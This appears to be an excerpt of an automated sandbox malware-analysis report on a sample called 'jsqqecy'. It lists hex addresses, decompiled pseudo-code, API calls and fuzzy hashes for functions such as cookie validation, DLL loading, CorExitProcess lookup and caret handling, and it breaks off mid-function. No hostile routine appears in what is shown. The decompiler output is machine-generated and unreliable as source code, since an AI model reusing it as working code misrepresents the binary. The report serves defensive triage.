                          0x00bcee59
                          0x00bcee5d
                          0x00bcee61
                          0x00bcee61
                          0x00bcee63
                          0x00bcee65
                          0x00bcee67
                          0x00bcee69
                          0x00bcee69
                          0x00bcee69
                          0x00bcee6c
                          0x00bcee6c
                          0x00bcee73
                          0x00bcee75
                          0x00000000
                          0x00bcee7b
                          0x00bcee7b
                          0x00bcee7f
                          0x00bcee83
                          0x00bcee83
                          0x00bcee85
                          0x00bcee87
                          0x00bcee89
                          0x00bcee8b
                          0x00bcee8b
                          0x00bcee8b
                          0x00bcee8e
                          0x00bcee8e
                          0x00bcee95
                          0x00bcee97
                          0x00000000
                          0x00bcee9d
                          0x00bcee9d
                          0x00bceea1
                          0x00bceea5
                          0x00bceea5
                          0x00bceea7
                          0x00bceea9
                          0x00bceeab
                          0x00bceead
                          0x00bceead
                          0x00bceead
                          0x00bceeb0
                          0x00bceeb0
                          0x00bceeb7
                          0x00bceeb9
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bceeb9
                          0x00bcee97
                          0x00bcee75
                          0x00bcee53
                          0x00000000
                          0x00000000
                          0x00bcf245
                          0x00bcf245
                          0x00bcf248
                          0x00bcf24b
                          0x00000000
                          0x00bcf251
                          0x00bcf251
                          0x00bcf254
                          0x00bcf258
                          0x00bcf258
                          0x00bcf25a
                          0x00bcf25c
                          0x00bcf25e
                          0x00bcf260
                          0x00bcf260
                          0x00bcf260
                          0x00bcf263
                          0x00bcf263
                          0x00bcf26a
                          0x00bcf26c
                          0x00000000
                          0x00bcf272
                          0x00bcf272
                          0x00bcf276
                          0x00bcf27a
                          0x00bcf27a
                          0x00bcf27c
                          0x00bcf27e
                          0x00bcf280
                          0x00bcf282
                          0x00bcf282
                          0x00bcf282
                          0x00bcf285
                          0x00bcf285
                          0x00bcf28c
                          0x00bcf28e
                          0x00000000
                          0x00bcf294
                          0x00bcf294
                          0x00bcf298
                          0x00bcf29c
                          0x00bcf29c
                          0x00bcf29e
                          0x00bcf2a0
                          0x00bcf2a2
                          0x00bcf2a4
                          0x00bcf2a4
                          0x00bcf2a4
                          0x00bcf2a7
                          0x00bcf2a7
                          0x00bcf2ae
                          0x00bcf2b0
                          0x00000000
                          0x00bcf2b6
                          0x00bcf2b6
                          0x00bcf2ba
                          0x00bcf2be
                          0x00bcf2be
                          0x00bcf2c0
                          0x00bcf2c2
                          0x00bcf2c4
                          0x00bcf2c6
                          0x00bcf2c6
                          0x00bcf2c6
                          0x00bcf2c9
                          0x00bcf2c9
                          0x00bcf2d0
                          0x00bcf2d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcf2d2
                          0x00bcf2b0
                          0x00bcf28e
                          0x00bcf26c
                          0x00000000
                          0x00000000
                          0x00bce584
                          0x00bce587
                          0x00bce58a
                          0x00000000
                          0x00bce590
                          0x00bce597
                          0x00bce597
                          0x00bce599
                          0x00bce59d
                          0x00bce59f
                          0x00bce59f
                          0x00bce5a2
                          0x00bce5a2
                          0x00bce5a9
                          0x00bce5ab
                          0x00bce5b9
                          0x00bce5b9
                          0x00bce5bb
                          0x00bce5bf
                          0x00bce5c1
                          0x00bce5c1
                          0x00bce5c4
                          0x00bce5c4
                          0x00bce5cb
                          0x00bce5cd
                          0x00bce5db
                          0x00bce5db
                          0x00bce5dd
                          0x00bce5e1
                          0x00bce5e3
                          0x00bce5e3
                          0x00bce5e6
                          0x00bce5e6
                          0x00bce5ed
                          0x00bce5ef
                          0x00bce5fd
                          0x00bce5fd
                          0x00bce5ff
                          0x00bce603
                          0x00bce605
                          0x00bce605
                          0x00bce608
                          0x00bce608
                          0x00bce60f
                          0x00bce611
                          0x00000000
                          0x00000000
                          0x00bce611
                          0x00bce5ef
                          0x00bce5cd
                          0x00bce5ab
                          0x00000000
                          0x00000000
                          0x00bce97f
                          0x00bce982
                          0x00bce985
                          0x00000000
                          0x00bce987
                          0x00bce987
                          0x00bce98a
                          0x00bce98e
                          0x00bce98e
                          0x00bce990
                          0x00bce992
                          0x00bce994
                          0x00bce996
                          0x00bce996
                          0x00bce996
                          0x00bce999
                          0x00bce999
                          0x00bce9a0
                          0x00bce9a2
                          0x00000000
                          0x00bce9a4
                          0x00bce9a4
                          0x00bce9a8
                          0x00bce9ac
                          0x00bce9ac
                          0x00bce9ae
                          0x00bce9b0
                          0x00bce9b2
                          0x00bce9b4
                          0x00bce9b4
                          0x00bce9b4
                          0x00bce9b7
                          0x00bce9b7
                          0x00bce9be
                          0x00bce9c0
                          0x00000000
                          0x00bce9c2
                          0x00bce9c2
                          0x00bce9c6
                          0x00bce9ca
                          0x00bce9ca
                          0x00bce9cc
                          0x00bce9ce
                          0x00bce9d0
                          0x00bce9d2
                          0x00bce9d2
                          0x00bce9d2
                          0x00bce9d5
                          0x00bce9d5
                          0x00bce9dc
                          0x00bce9de
                          0x00000000
                          0x00bce9e0
                          0x00bce9e0
                          0x00bce9e4
                          0x00bce9e8
                          0x00bce9e8
                          0x00bce9ea
                          0x00bce9ec
                          0x00bce9ee
                          0x00bce9f0
                          0x00bce9f0
                          0x00bce9f0
                          0x00bce9f3
                          0x00bce9f3
                          0x00bce9fa
                          0x00bce9fc
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bce9fc
                          0x00bce9de
                          0x00bce9c0
                          0x00bce9a2
                          0x00000000
                          0x00000000
                          0x00bced99
                          0x00bced9c
                          0x00bced9f
                          0x00000000
                          0x00bceda5
                          0x00bceda5
                          0x00bceda8
                          0x00bcedac
                          0x00bcedac
                          0x00bcedae
                          0x00bcedb0
                          0x00bcedb2
                          0x00bcedb4
                          0x00bcedb4
                          0x00bcedb4
                          0x00bcedb7
                          0x00bcedb7
                          0x00bcedbe
                          0x00bcedc0
                          0x00000000
                          0x00bcedc6
                          0x00bcedc6
                          0x00bcedca
                          0x00bcedce
                          0x00bcedce
                          0x00bcedd0
                          0x00bcedd2
                          0x00bcedd4
                          0x00bcedd6
                          0x00bcedd6
                          0x00bcedd6
                          0x00bcedd9
                          0x00bcedd9
                          0x00bcede0
                          0x00bcede2
                          0x00000000
                          0x00bcede8
                          0x00bcede8
                          0x00bcedec
                          0x00bcedf0
                          0x00bcedf0
                          0x00bcedf2
                          0x00bcedf4
                          0x00bcedf6
                          0x00bcedf8
                          0x00bcedf8
                          0x00bcedf8
                          0x00bcedfb
                          0x00bcedfb
                          0x00bcee02
                          0x00bcee04
                          0x00000000
                          0x00bcee0a
                          0x00bcee0a
                          0x00bcee0e
                          0x00bcee12
                          0x00bcee12
                          0x00bcee14
                          0x00bcee16
                          0x00bcee18
                          0x00bcee1a
                          0x00bcee1a
                          0x00bcee1a
                          0x00bcee1d
                          0x00bcee1d
                          0x00bcee24
                          0x00bcee26
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcee26
                          0x00bcee04
                          0x00bcede2
                          0x00bcedc0
                          0x00000000
                          0x00000000
                          0x00bcf1b2
                          0x00bcf1b5
                          0x00bcf1b8
                          0x00000000
                          0x00bcf1be
                          0x00bcf1be
                          0x00bcf1c1
                          0x00bcf1c5
                          0x00bcf1c5
                          0x00bcf1c7
                          0x00bcf1c9
                          0x00bcf1cb
                          0x00bcf1cd
                          0x00bcf1cd
                          0x00bcf1cd
                          0x00bcf1d0
                          0x00bcf1d0
                          0x00bcf1d7
                          0x00bcf1d9
                          0x00000000
                          0x00bcf1df
                          0x00bcf1df
                          0x00bcf1e3
                          0x00bcf1e7
                          0x00bcf1e7
                          0x00bcf1e9
                          0x00bcf1eb
                          0x00bcf1ed
                          0x00bcf1ef
                          0x00bcf1ef
                          0x00bcf1ef
                          0x00bcf1f2
                          0x00bcf1f2
                          0x00bcf1f9
                          0x00bcf1fb
                          0x00000000
                          0x00bcf201
                          0x00bcf201
                          0x00bcf205
                          0x00bcf209
                          0x00bcf209
                          0x00bcf20b
                          0x00bcf20d
                          0x00bcf20f
                          0x00bcf211
                          0x00bcf211
                          0x00bcf211
                          0x00bcf214
                          0x00bcf214
                          0x00bcf21b
                          0x00bcf21d
                          0x00000000
                          0x00bcf223
                          0x00bcf223
                          0x00bcf227
                          0x00bcf22b
                          0x00bcf22b
                          0x00bcf22d
                          0x00bcf22f
                          0x00bcf231
                          0x00bcf233
                          0x00bcf233
                          0x00bcf233
                          0x00bcf236
                          0x00bcf236
                          0x00bcf23d
                          0x00bcf23f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bcf23f
                          0x00bcf21d
                          0x00bcf1fb
                          0x00bcf1d9
                          0x00000000
                          0x00000000
                          0x00bce57d
                          0x00bce0bf
                          0x00bce0b6
                          0x00bce0ad
                          0x00bce0a4
                          0x00bcf685
                          0x00bcf688
                          0x00bcdfc2
                          0x00000000
                          0x00bcdfc2
                          0x00bcdfc0
                          0x00bcdfbe
                          0x00000000
                          0x00bcdfc7
                          0x00bcdfc7
                          0x00bcdfc9
                          0x00bcdfd0
                          0x00000000
                          0x00bcdfd2
                          0x00000000
                          0x00bcdfd0
                          0x00bcdf95
                          0x00000000

                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 00BCDF67
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00BCDF6F
                          • _ValidateLocalCookies.LIBCMT ref: 00BCDFF8
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00BCE023
                          • _ValidateLocalCookies.LIBCMT ref: 00BCE078
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 52658300be47eda0dca1d2e4686ce0e011764d4c074fc2c7c776cb1593d1c79e
                          • Instruction ID: d43bddc3ec099c488a37d2259c18c5a3b16cea8ba4b9c742a4f4091b3897fad5
                          • Opcode Fuzzy Hash: 52658300be47eda0dca1d2e4686ce0e011764d4c074fc2c7c776cb1593d1c79e
                          • Instruction Fuzzy Hash: 99419F34A002499BCF10DF68C885B9EBBF5EF44324F1481EAE915AB392D775EA41CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC99B0 Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: CaretFocus$HideInvertRectReleaseShow
                          • String ID:
                          • API String ID: 4235554027-0
                          • Opcode ID: 200ef63190914c61e152883235fc9517f4b8452215a76c53ca465a1f1600c3a8
                          • Instruction ID: 1ba0e7d4c5f3f789ca9cfffa44f4b80436c1ef7889a2e123fb9f03cc63f8acae
                          • Opcode Fuzzy Hash: 200ef63190914c61e152883235fc9517f4b8452215a76c53ca465a1f1600c3a8
                          • Instruction Fuzzy Hash: 00318475A04209DFDB04DFA8D589AAD7BF0EF08311F1584A9F8899B350DB34EA84CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD23C9 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00BD23C9(void* __ecx, signed int* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t20;
				void* _t22;
				WCHAR* _t26;
				signed int _t29;
				void** _t30;
				signed int* _t35;
				void* _t38;
				void* _t40;

				_t35 = _a4;
				while(_t35 != _a8) {
					_t29 =  *_t35;
					_v8 = _t29;
					_t38 =  *(0xbe60b0 + _t29 * 4);
					if(_t38 == 0) {
						_t26 =  *(0xbdcae0 + _t29 * 4);
						_t38 = LoadLibraryExW(_t26, 0, 0x800);
						if(_t38 != 0) {
							L14:
							_t30 = 0xbe60b0 + _v8 * 4;
							 *_t30 = _t38;
							if( *_t30 != 0) {
								FreeLibrary(_t38);
							}
							L16:
							_t20 = _t38;
							L13:
							return _t20;
						}
						_t22 = GetLastError();
						if(_t22 != 0x57) {
							L9:
							 *(0xbe60b0 + _v8 * 4) = _t22 | 0xffffffff;
							L10:
							_t35 =  &(_t35[1]);
							continue;
						}
						_t22 = E00BD4AB9(_t26, L"api-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = E00BD4AB9(_t26, L"ext-ms-", 7);
						_t40 = _t40 + 0xc;
						if(_t22 == 0) {
							goto L9;
						}
						_t22 = LoadLibraryExW(_t26, _t38, _t38);
						_t38 = _t22;
						if(_t38 != 0) {
							goto L14;
						}
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						goto L16;
					}
					goto L10;
				}
				_t20 = 0;
				goto L13;
			}












                          0x00bd23d2
                          0x00bd2467
                          0x00bd23da
                          0x00bd23dc
                          0x00bd23e6
                          0x00bd23eb
                          0x00bd23f8
                          0x00bd240d
                          0x00bd2411
                          0x00bd2477
                          0x00bd247c
                          0x00bd2483
                          0x00bd2487
                          0x00bd248a
                          0x00bd248a
                          0x00bd2490
                          0x00bd2490
                          0x00bd2472
                          0x00bd2476
                          0x00bd2476
                          0x00bd2413
                          0x00bd241c
                          0x00bd2455
                          0x00bd2462
                          0x00bd2464
                          0x00bd2464
                          0x00000000
                          0x00bd2464
                          0x00bd2426
                          0x00bd242b
                          0x00bd2430
                          0x00000000
                          0x00000000
                          0x00bd243a
                          0x00bd243f
                          0x00bd2444
                          0x00000000
                          0x00000000
                          0x00bd2449
                          0x00bd244f
                          0x00bd2453
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd2453
                          0x00bd23f0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd23f6
                          0x00bd2470
                          0x00000000

                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,E9E688DC,?,00BD24D6,?,00BD0FC5,00000000,00000000), ref: 00BD248A
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: c5130dce7a706f6a3657d8c1ea58cd06cda209219721de1e9569e97cf233c39a
                          • Instruction ID: f7e69512953cfedd7b15dcdb74bfc31a322f194dd2ffb65824cdd713eb94e97b
                          • Opcode Fuzzy Hash: c5130dce7a706f6a3657d8c1ea58cd06cda209219721de1e9569e97cf233c39a
                          • Instruction Fuzzy Hash: ED213031A002D1A7C7319B65DCC4B5AB7E8DB21770F2081A2EE16A7390FB70ED00C9D0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD1CDC Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 82%
                          			E00BD1CDC(void* __ecx) {
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0xbe4064 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00BD6026(_t13,  *0xbe4064);
					_t14 = _t23;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						if(_t11 == 0) {
							if(E00BD6061(_t14,  *0xbe4064, 0xffffffff) != 0) {
								_push(0x28);
								_t27 = E00BD0FA2();
								_t18 = 1;
								if(_t27 == 0) {
									L8:
									_t11 = 0;
									E00BD6061(_t18,  *0xbe4064, 0);
								} else {
									_t8 = E00BD6061(_t18,  *0xbe4064, _t27);
									_pop(_t18);
									if(_t8 != 0) {
										_t11 = _t27;
										_t27 = 0;
									} else {
										goto L8;
									}
								}
								E00BD0FAD(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}











                          0x00bd1cdc
                          0x00bd1ce3
                          0x00bd1cf6
                          0x00bd1cfd
                          0x00bd1cff
                          0x00bd1d03
                          0x00bd1d1c
                          0x00bd1d1c
                          0x00bd1d05
                          0x00bd1d07
                          0x00bd1d1a
                          0x00bd1d21
                          0x00bd1d2a
                          0x00bd1d2d
                          0x00bd1d30
                          0x00bd1d44
                          0x00bd1d44
                          0x00bd1d4d
                          0x00bd1d32
                          0x00bd1d39
                          0x00bd1d3f
                          0x00bd1d42
                          0x00bd1d56
                          0x00bd1d58
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd1d42
                          0x00bd1d5b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00bd1d1a
                          0x00bd1d07
                          0x00bd1d63
                          0x00bd1d6d
                          0x00bd1ce5
                          0x00bd1ce7
                          0x00bd1ce7

                          APIs
                          • GetLastError.KERNEL32(?,?,00BD1CD3,00BCDD93,00BCD8EB), ref: 00BD1CEA
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00BD1CF8
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00BD1D11
                          • SetLastError.KERNEL32(00000000,00BD1CD3,00BCDD93,00BCD8EB), ref: 00BD1D63
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: 7f7eb50f84688098c6d122e2e5da1652e6939e08bebcde31cacecb1e10f6e33a
                          • Instruction ID: 867a7ba8e3e5aa3be75b6327eb804cfc3a0867792b050e285f93e4de0492c8aa
                          • Opcode Fuzzy Hash: 7f7eb50f84688098c6d122e2e5da1652e6939e08bebcde31cacecb1e10f6e33a
                          • Instruction Fuzzy Hash: 550184322093617EA73427BD7DC6666ABD5DB5277473006FBF6214A2F2FF214C415244
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCB480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155windowCOMMON
                          Download Yara Rule
                          APIs
                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,00BC9824), ref: 00BCB4B3
                          • DestroyCaret.USER32 ref: 00BCB4C6
                          • DeleteObject.GDI32 ref: 00BCB4EE
                          • CreateBitmap.GDI32 ref: 00BCB69B
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: BitmapCaretCreateDeleteDestroyFocusObject
                          • String ID: d
                          • API String ID: 3626877506-2564639436
                          • Opcode ID: d032eefba288bab0aca1350d3e037e5b5b6038351d7fd2f784f2cf588b4e3ed7
                          • Instruction ID: e5931a86a3d0d93d5c12d146f5d5436605c5f0f1af399cd618b8df4789f67631
                          • Opcode Fuzzy Hash: d032eefba288bab0aca1350d3e037e5b5b6038351d7fd2f784f2cf588b4e3ed7
                          • Instruction Fuzzy Hash: 5671AE74A042199FCB04DF58C099FADBBF1BB48315F1584A9E889EB362D735E980CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BC33D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: System
                          • String ID: `
                          • API String ID: 3470857405-2679148245
                          • Opcode ID: 11ce11521cc4d3f66aab56aee15c3bc14f0ed0eada4ccacd06648ba8595bfb75
                          • Instruction ID: c4cfbd7a24dc6f9e9020593a6ade215b8a236c606fabb0399421e821c1353cf0
                          • Opcode Fuzzy Hash: 11ce11521cc4d3f66aab56aee15c3bc14f0ed0eada4ccacd06648ba8595bfb75
                          • Instruction Fuzzy Hash: 53413FB4104209AFD740DF18D598B9ABBE0FB48314F01C49AEC688F362D7B9D948DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD007C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 25%
                          			E00BD007C(intOrPtr _a4) {
				char _v16;
				signed int _v20;
				signed int _t11;
				int _t14;
				void* _t16;
				void* _t20;
				int _t22;
				signed int _t23;

				_t11 =  *0xbe4050; // 0xe9e688dc
				 *[fs:0x0] =  &_v16;
				_v20 = _v20 & 0x00000000;
				_t14 =  &_v20;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t14, _t11 ^ _t23, _t20, _t16,  *[fs:0x0], 0xbdaf96, 0xffffffff);
				if(_t14 != 0) {
					_t14 = GetProcAddress(_v20, "CorExitProcess");
					_t22 = _t14;
					if(_t22 != 0) {
						 *0xbe7000(_a4);
						_t14 =  *_t22();
					}
				}
				if(_v20 != 0) {
					_t14 = FreeLibrary(_v20);
				}
				 *[fs:0x0] = _v16;
				return _t14;
			}











                          0x00bd0091
                          0x00bd009c
                          0x00bd00a2
                          0x00bd00a6
                          0x00bd00b1
                          0x00bd00b9
                          0x00bd00c3
                          0x00bd00c9
                          0x00bd00cd
                          0x00bd00d4
                          0x00bd00da
                          0x00bd00da
                          0x00bd00cd
                          0x00bd00e0
                          0x00bd00e5
                          0x00bd00e5
                          0x00bd00ee
                          0x00bd00f8

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E9E688DC,?,?,00000000,00BDAF96,000000FF,?,00BD0146,00BCFFE1,?,00BD01E2,00000000), ref: 00BD00B1
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD00C3
                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,00BDAF96,000000FF,?,00BD0146,00BCFFE1,?,00BD01E2,00000000), ref: 00BD00E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 774bf299e1ca365de63391437ac008a1176b2c033988d5fca75a9e0c266b7996
                          • Instruction ID: 8f71affda13cd39ab6428780e18a66e40d0630e9c41f0e8a0694ca5ba98b48a0
                          • Opcode Fuzzy Hash: 774bf299e1ca365de63391437ac008a1176b2c033988d5fca75a9e0c266b7996
                          • Instruction Fuzzy Hash: 34018F31954659EFCB129B54DC49FAEBBF8FB04B15F004A66E811A66A0EB749900CA90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BCA4B0 Relevance: 7.5, APIs: 5, Instructions: 47windowclipboardCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000001.00000002.304414119.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                          • Associated: 00000001.00000002.304401078.0000000000BC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304449543.0000000000BDC000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304461925.0000000000BE4000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304469184.0000000000BE6000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000001.00000002.304488307.0000000000BE9000.00000002.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_bc0000_jsqqecy.jbxd
                          Similarity
                          • API ID: EnableItemMenu$AvailableClipboardFormat
                          • String ID:
                          • API String ID: 4217543366-0
                          • Opcode ID: 30633108bab1cf2227c3af9f5598104b8b413a38a1367425fbee211e26d089b3
                          • Instruction ID: 519e69394b5afae3bbfa53aaf3eac785b31213a3a449027c427017874e93d91a
                          • Opcode Fuzzy Hash: 30633108bab1cf2227c3af9f5598104b8b413a38a1367425fbee211e26d089b3
                          • Instruction Fuzzy Hash: 83119874605204AFD744EF68D59979EBBE0EB84701F10C82DFC898B394DB74D8849B56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00BD7F07 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 59%
                          			E00BD7F07(void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v80;
				void* __ebx;
				void* __ebp;
				void* _t57;
				void* _t58;
				char _t59;
				intOrPtr* _t64;
				void* _t65;
				intOrPtr* _t70;
				void* _t73;
				signed char* _t76;
				intOrPtr* _t79;
				void* _t81;
				signed int _t85;
